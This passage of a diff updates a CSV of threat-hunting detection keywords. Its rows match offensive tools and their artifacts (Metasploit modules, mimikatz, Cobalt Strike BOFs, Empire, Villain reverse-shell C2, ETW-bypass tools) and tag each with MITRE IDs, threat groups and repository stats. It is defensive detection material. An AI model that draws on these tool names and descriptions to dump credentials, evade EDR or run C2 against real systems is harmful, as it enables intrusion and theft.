understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_vmware.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_vyos.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*enum_shares.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_vmware.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_vyos.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*enum4linux*","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","N/A","N/A","10","944","228","2023-05-09T22:54:24Z","2015-07-31T21:06:03Z" -"*enum4linux_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*enum4linux_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*enum4linux-ng -A -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*EnumCLR.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Enum-Creds*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enum-Creds*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*enumerate.cna*","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*EnumerateAllDomainControllers*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Enumerate-AllHighPrivilegePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" @@ -9908,37 +10057,37 @@ "*Enumeration/DesktopACL*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*Enumeration\DesktopAC*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*env_var_spoofing_poc.cpp*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*eo.oe.kiwi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*eo.oe.kiwi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Erebus/*spacerunner*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*eRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*eRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*ES.Alan.Core/*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*EspressoCake/PPLDump_BOF*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Eternalblue-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*EternalBlue.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*eternalblue.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*EternalBlue.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*eternalblue.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Eternalblue-Doublepulsar*","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agencys (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11]","T1055 - T1043 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","10","1055","545","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z" "*EternalHushFramework-*-SNAPSHOT.jar*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*EternalHushFramework-main*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*EternalHushMain.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*EternalHushWindow.java*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*ethereum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*ETWEventSubscription*Program.cs*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*ETWEventSubscription.exe* -ProcStart *","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*ETWEventSubscription.exe* -UserLogon*","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ethereum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - 